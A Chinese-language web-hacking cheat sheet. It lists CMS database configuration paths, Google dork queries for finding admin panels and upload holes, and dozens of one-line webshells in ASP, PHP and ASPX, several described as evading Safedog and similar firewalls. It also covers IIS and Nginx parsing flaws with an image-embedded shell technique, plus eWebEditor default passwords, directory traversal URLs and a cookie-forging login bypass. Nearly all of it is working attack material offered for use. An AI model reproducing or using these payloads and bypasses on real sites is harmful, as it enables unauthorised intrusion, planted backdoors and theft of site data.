asp类:

foosun(风讯)
kesion(科汛)newasp(新云)
乔客CreateLive(创力)
5uCMSKingCMS
DvBBS(动网)
BBSxp[博客]zblog
[博客]pjblog

—————————————————————————————–

PHP类:
DeDeCms(织梦)
ECMS(帝国)
PHPCMS
PHP168
HBcms(宏博)SupeSite
CMSware(思维)Joomla!
Discuz!
phpWindUCenterHome
ThinkSNS[商城]EcShop
[商城]ShopEx[博客]WordPress
[维基]HDWiki
[微博]PHPsayPBdigg
—————————————————————————————–

php开源mysql绝对路径
开源系统 数据库配置文件名 文件名所在的目录

Discuz! config.inc.php ./ config.inc.php

Phpcms config.inc.php ./include/config.inc.php

Wodpress wp-config.php ./ wp-config.php

Phpwind sqlconfig.php ./data/sqlconfig.php

phpweb config.inc.php ./config.inc.php

Php168v6 mysql_config.php ./php168/ mysql_config.php

Shopex config.php ./config/config.php

Ecshop config.php ./data/config.php

Joomla configuration.php ./ configuration.php

UCenter config.inc.php ./data/config.inc.php

EmpireCMS config.php ./e/class/config.php

Dedecms common.inc.php .data/common.inc.php

Zen Cart configure.php ./includes/configure.php

Mediawiki localsettints.php ./config/localsettints.php

Ecshop config.php ./data/config.php

osCommerce configure.php ./includes/configure.php

—————————————————————————————–

【 谷歌语法 】

site:可以限制你搜索范围的域名.

inurl:用于搜索网页上包含的URL,这个语法对寻找网页上的搜索,帮助之类的很有用.

intext: 只搜索网页<body>部分中包含的文字(也就是忽略了标题、URL等的文字)

intitle: 查包含关键词的页面,一般用于社工别人的webshell密码

filetype:搜索文件的后缀或者扩展名

intitle:限制你搜索的网页标题.

link: 可以得到一个所有包含了某个指定URL的页面列表.

查找后台地址:site:域名 inurl:login|admin|manage|member|admin_login|login_admin|system|login|user|main|cms

查找文本内容:site:域名 intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|admin|login|sys|managetem|password|username

查找可注入点:site:域名 inurl:aspx|jsp|php|asp

查找上传漏洞:site:域名 inurl:file|load|editor|Files

找eweb编辑器:site:域名 inurl:ewebeditor|editor|uploadfile|eweb|edit

存在的数据库:site:域名 filetype:mdb|asp|#

查看脚本类型:site:域名 filetype:asp/aspx/php/jsp

迂回策略**:inurl:cms/data/templates/images/index/
网络设备关键词:intext:WEB Management Interface for H3C SecPath Series

==========================================================================================================================

【 一句话木马 】

asp一句话木马:<%eval request(“x”)%>

php一句话木马:<?php eval($_POST);?>

aspx一句话:<%@ Page Language=”Jscript”%><%eval(Request.Item[“x”],”unsafe”);%>

网站配置、版权信息专用一句话:”%><%Eval Request(x)%>

一句话再过护卫神:<%Y=request(“x”)%> <%execute(Y)%>

过拦截一句话木马:<% eXEcGlOBaL ReQuEsT(“x”) %>

asp闭合型一句话 %><%eval request(“0o1Znz1ow”)%><%

能过安全狗的解析格式:;hfdjf.;dfd.;dfdfdfd.asp;sdsd.jpg

突破安全狗的一句话:<%Y=request(“x”)%> <%eval(Y)%>

elong过安全狗的php一句话:<?php $a = “a”.”s”.”s”.”e”.”r”.”t”; $a($_POST); ?>

后台常用写入php一句话(密码x):

<?

$fp = @fopen(“c.php”, ‘a’);

@fwrite($fp, ‘<‘.’?php’.”\r\n\r\n”.’eval($_POST)’.”\r\n\r\n?”.”>\r\n”);

@fclose($fp);

?>

高强度php一句话:

<?php substr(md5($_REQUEST[‘heroes’]),28)==’acd0’&&eval($_REQUEST[‘c’]);?>

新型变异PHP一句话(密码b4dboy):

($b4dboy = $_POST[‘b4dboy’]) && @preg_replace(‘/ad/e’,’@’.str_rot13(‘riny’).’($b4dboy)’, ‘add’);

突破安全狗的aspx一句话:

<%@ Page Language=”C#” ValidateRequest=”false” %>

<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies[“你的密码”].Value))).CreateInstance(“c”, true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

突破护卫神,保护盾一句话:

<?php $a = str_replace(x,””,”axsxxsxexrxxt”);

$a($_POST[“test”]); ?>

许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传,这样一句话木马就写入不进数据库了。

改成:〈scriptlanguage=VBScript runat=server〉execute request(“l”)〈/Script〉

这样就避开了使用〈%%〉,保存为.ASP,程序照样执行的效果是一样的。

PHP高强度一句话:

<?php substr(md5($_REQUEST[‘x’]),28)==’acd0’&&eval($_REQUEST[‘c’]);?> 菜刀连接:/x.php?x=lostwolf 脚本类型:php 密码:c

<?php assert($_REQUEST[“c”]);?> 菜刀连接 躲避检测 密码:c

==========================================================================================================================

【 解析漏洞总结 】

IIS 6.0

目录解析:/xx.asp/xx.jpg xx.jpg可替换为任意文本文件(e.g. xx.txt),文本内容为后门代码

IIS6.0 会将 xx.jpg 解析为 asp 文件。

后缀解析:/xx.asp;.jpg /xx.asp:.jpg(此处需抓包修改文件名)

IIS6.0 都会把此类后缀文件成功解析为 asp 文件。

默认解析:/xx.asa /xx.cer /xx.cdx

IIS6.0 默认的可执行文件除了 asp 还包含这三种

此处可联系利用目录解析漏洞 /xx.asa/xx.jpg 或 /xx.cer/xx.jpg 或 xx.asa;.jpg

IIS 7.0/ IIS 7.5/ Nginx <8.03

在默认Fast-CGI开启状况下,在一个文件路径(/xx.jpg)后面加上/xx.php会将 /xx.jpg/xx.php 解析为 php 文件。

常用利用方法: 将一张图和一个写入后门代码的文本文件合并 将恶意文本写入图片的二进制代码之后,避免破坏图片文件头和尾

e.g.

copy xx.jpg/b + yy.txt/a xy.jpg

/b 即二进制模式

/a 即ascii模式 xx.jpg正常图片文件

yy.txt 内容 <?PHP fputs(fopen(‘shell.php’,’w’),‘<?php eval($_POST)?>’);?>

意思为写入一个内容为 <?php eval($_POST)?> 名称为shell.php的文件

找个地方上传 xy.jpg ,然后找到 xy.jpg 的地址,在地址后加上 /xx.php 即可执行恶意文本。

.然后就在图片目录下生成一句话木马 shell.php 密码 cmd

==========================================================================================================================

【 ewebeditor编辑器 】

默认后台:ewebeditor/admin_login.asp

帐号密码:admin admin

样式设计:ewebeditor/admin_style.asp

查看版本:ewebeditor/dialog/about.html

数据库路径:db/ewebeditor.mdb db/%23ewebeditor.mdb db/%23ewebeditor.asp ewebeditor/db/!@#ewebeditor.asp (用谷歌语法找文件名)

遍历目录:ewebeditor/admin/upload.asp?id=16&amp;d_viewmode=&amp;dir =../..

跳转目录:ewebeditor/admin_uoloadfile.asp?id=14&dir=.. (dir为列目录, ..为返回上层目录),形式:dir ../..

点上传文件管理-随便选择一个样式目录,得到:ewindoweditor/admin_uoloadfile.asp?id=14 在id=14后面加&dir=../../../.. 就可看到整个网站的文件了(../自己加减)

( ewebeditor5.5版本 )

默认后台:ewebeditor/admin/login.asp

帐号密码:admin 198625

数据库路径:data/%23sze7xiaohu.mdb

遍历目录:ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=../

调用样式上传页面:ewebeditor/ewebeditor.htm?id=body&style=popup

( ewebeditor3.8 php版本 )

默认后台:eWebEditor/admin/login.php

首先随便输入一个帐号和密码,接着系统会提示出错,这时清空浏览器的url,然后输入以下代码后连按三次回车键:

javascript:alert(document.cookie=”adminuser=”+escape(”admin”));javascript:alert(document.cookie=”adminpass=”+escape(”admin”));javascript:alert(document.cookie=”admindj=”+escape(”1”));

接着访问文件:ewebeditor/admin/default.php 就可以直接进入后台了。

( ewebeditor编辑器exp手册 )

有时候什么后缀都上传了,还是不行。就增加一个asp:jpg格式 上传asp:jpg 试试

一:文件上传成功了,但是访问不成功,说明该目录(比如:/UploadFile)被设置了权限,返回去换成/ 上传到根目录就行了.增加asp等不行的时候,可以利用解析asp;jpg

二:下载数据库查看前人留下的痕迹,再访问上传页面拿shell。

页面路径:/ewebeditor.asp?id=48&style=popu7 用工具浏览数据库找到已添加asp|asa|cer|php的栏目,把S_ID跟S_Name的值替换在语句里访问,上传相对应的格式木马。